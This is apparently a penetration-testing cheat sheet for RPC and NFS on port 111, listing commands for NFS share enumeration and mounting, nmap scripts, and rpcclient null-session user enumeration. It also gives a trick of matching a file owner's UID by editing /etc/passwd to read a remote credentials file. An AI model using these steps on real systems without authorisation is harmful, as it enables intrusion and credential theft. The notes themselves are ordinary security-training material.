# Port 111 - RPC

# Basic enum

rpcinfo -p

# NFS shares

# List Shares
showmount -e 10.10.10.x

# Mount
mount -t nfs 10.10.10.x:/folderShared /mnt/folderToMount -nolock

# Nmap
sudo nmap -p 111 --script nfs* 10.10.10.x

If getting permission denied to read files inside the mounted directory, create a user in Kali with the same UID.

# Exploit User UID permissions

# Check who can view the files and get the UID
$ ls -la ~/home
-rwx------ 1 1014 1014 48 Jun 25 06:08 creds.txt

# We can note that UID 1014 can read/execute the creds.txt
# Add a new user with same UID in Kali
$ sudo adduser pwn

# Change UID
$ sudo sed -i -e 's/1001/1014/g' /etc/passwd

# Change user to pwn
Now you can access the ~/home/creds.txt

# Enumerate users

rpcclient -U '' 10.10.10.x
> enumdomusers

# Connect with a null-session

Only works for older windows servers.

rpcclient -U james
rpcclient -U "" (press enter if asks for a password)
rpcclient> srvinfo
rpcclient> enumdomusers
rpcclient> enumalsgroups domain
rpcclient> lookupnames administrators
rpcclient> querydominfo
rpcclient> enumdomusers
rpcclient> queryuser john